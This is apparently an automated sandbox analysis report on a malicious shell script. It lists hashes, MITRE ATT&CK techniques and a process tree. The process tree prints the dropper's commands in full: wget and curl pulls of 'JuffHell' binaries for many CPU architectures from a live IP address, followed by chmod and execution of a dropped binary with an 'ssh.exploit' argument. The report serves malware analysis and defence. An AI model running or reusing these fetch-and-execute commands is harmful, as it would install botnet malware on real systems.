55e90e18b443a15116c1102dd21397fd1c7dd1e9aff347e1267c27032e3e4bb3

Analysis

max time kernel
40s
max time network
44s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
14-10-2024 14:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
Size

3KB
MD5

4de883db50a87d2eaf32038a6f48a3cf
SHA1

5d786ee84056677315f5eb9315f7a40d7fe8cb94
SHA256

30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55
SHA512

36bee2e2e6850fd3fb99fe832fb3de0f4792ac2b6fc7dc24987f4efb53ab8e747e6ace4d518ac3e2efa62cf997e787be7107b28a2cf305b0f7d13bbace13631d

Score

7^/10

antivm defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 13 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
685	chmod
695	chmod
773	chmod
786	chmod
800	chmod
812	chmod
700	chmod
707	chmod
720	chmod
733	chmod
744	chmod
758	chmod
792	chmod

Executes dropped EXE 13 IoCs

ioc	pid	Process
/tmp/dayum0x1a5sfd15as1fa	686	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	696	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	701	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	708	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	722	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	734	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	746	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	759	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	774	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	788	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	793	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	802	dayum0x1a5sfd15as1fa
/tmp/dayum0x1a5sfd15as1fa	814	dayum0x1a5sfd15as1fa

Checks CPU configuration 1 TTPs 13 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 26 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/self/auxv	curl

System Network Configuration Discovery 1 TTPs 3 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
687	wget
692	curl
694	cat

Writes file to tmp directory 14 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/JuffHell.x86	curl
File opened for modification	/tmp/JuffHell.spc	curl
File opened for modification	/tmp/JuffHell.arm6	curl
File opened for modification	/tmp/JuffHell.arc	curl
File opened for modification	/tmp/JuffHell.mips	curl
File opened for modification	/tmp/JuffHell.mpsl	curl
File opened for modification	/tmp/JuffHell.arm5	curl
File opened for modification	/tmp/dayum0x1a5sfd15as1fa	30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
File opened for modification	/tmp/JuffHell.ppc	curl
File opened for modification	/tmp/JuffHell.sh4	curl
File opened for modification	/tmp/JuffHell.i686	curl
File opened for modification	/tmp/JuffHell.arm	curl
File opened for modification	/tmp/JuffHell.arm7	curl
File opened for modification	/tmp/JuffHell.m68k	curl

/tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
/tmp/30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh
1⤵
- Writes file to tmp directory
PID:659
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.x86
  2⤵
  PID:665
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:677
- /bin/cat
  cat JuffHell.x86
  2⤵
  PID:683
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka
  2⤵
  - File and Directory Permissions Modification
  PID:685
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:686
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.mips
  2⤵
  - System Network Configuration Discovery
  PID:687
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.mips
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:692
- /bin/cat
  cat JuffHell.mips
  2⤵
  - System Network Configuration Discovery
  PID:694
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka
  2⤵
  - File and Directory Permissions Modification
  PID:695
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:696
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.mpsl
  2⤵
  PID:697
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:698
- /bin/cat
  cat JuffHell.mpsl
  2⤵
  PID:699
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka
  2⤵
  - File and Directory Permissions Modification
  PID:700
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:701
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arm
  2⤵
  PID:702
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:703
- /bin/cat
  cat JuffHell.arm
  2⤵
  PID:706
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka
  2⤵
  - File and Directory Permissions Modification
  PID:707
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:708
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arm5
  2⤵
  PID:709
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:714
- /bin/cat
  cat JuffHell.arm5
  2⤵
  PID:719
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka
  2⤵
  - File and Directory Permissions Modification
  PID:720
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:722
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arm6
  2⤵
  PID:723
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:727
- /bin/cat
  cat JuffHell.arm6
  2⤵
  PID:731
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka
  2⤵
  - File and Directory Permissions Modification
  PID:733
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:734
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arm7
  2⤵
  PID:735
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arm7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:740
- /bin/cat
  cat JuffHell.arm7
  2⤵
  PID:743
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka
  2⤵
  - File and Directory Permissions Modification
  PID:744
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:746
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.ppc
  2⤵
  PID:747
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.ppc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:752
- /bin/cat
  cat JuffHell.ppc
  2⤵
  PID:755
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:759
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.m68k
  2⤵
  PID:761
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.m68k
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:768
- /bin/cat
  cat JuffHell.m68k
  2⤵
  PID:771
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.x86 systemd-private-d03246a36b6542df93d4a2006d99154b-systemd-timedated.service-tVAuka
  2⤵
  - File and Directory Permissions Modification
  PID:773
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:774
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.spc
  2⤵
  PID:775
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.spc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:782
- /bin/cat
  cat JuffHell.spc
  2⤵
  PID:784
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:786
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:788
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.i686
  2⤵
  PID:789
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.i686
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:790
- /bin/cat
  cat JuffHell.i686
  2⤵
  PID:791
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.spc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:792
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:793
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.sh4
  2⤵
  PID:794
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.sh4
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:795
- /bin/cat
  cat JuffHell.sh4
  2⤵
  PID:799
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:800
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:802
- /usr/bin/wget
  wget http://194.15.36.34/xxx9/JuffHell.arc
  2⤵
  PID:803
- /usr/bin/curl
  curl -O http://194.15.36.34/xxx9/JuffHell.arc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:808
- /bin/cat
  cat JuffHell.arc
  2⤵
  PID:811
- /bin/chmod
  chmod +x 30c9166a9f2c32bd7e85ba03474d71f304a7b298c50b864e488d1f9efced6c55.sh dayum0x1a5sfd15as1fa JuffHell.arc JuffHell.arm JuffHell.arm5 JuffHell.arm6 JuffHell.arm7 JuffHell.i686 JuffHell.m68k JuffHell.mips JuffHell.mpsl JuffHell.ppc JuffHell.sh4 JuffHell.spc JuffHell.x86
  2⤵
  - File and Directory Permissions Modification
  PID:812
- /tmp/dayum0x1a5sfd15as1fa
  ./dayum0x1a5sfd15as1fa ssh.exploit
  2⤵
  - Executes dropped EXE
  PID:814

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/JuffHell.x86

Filesize
162B

MD5
4f8e702cc244ec5d4de32740c0ecbd97

SHA1
3adb1f02d5b6054de0046e367c1d687b6cdf7aff

SHA256
9e17cb15dd75bbbd5dbb984eda674863c3b10ab72613cf8a39a00c3e11a8492a

SHA512
21047fea5269fee75a2a187aa09316519e35068cb2f2f76cfaf371e5224445e9d5c98497bd76fb9608d2b73e9dac1a3f5bfadfdc4623c479d53ecf93d81d3c9f

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads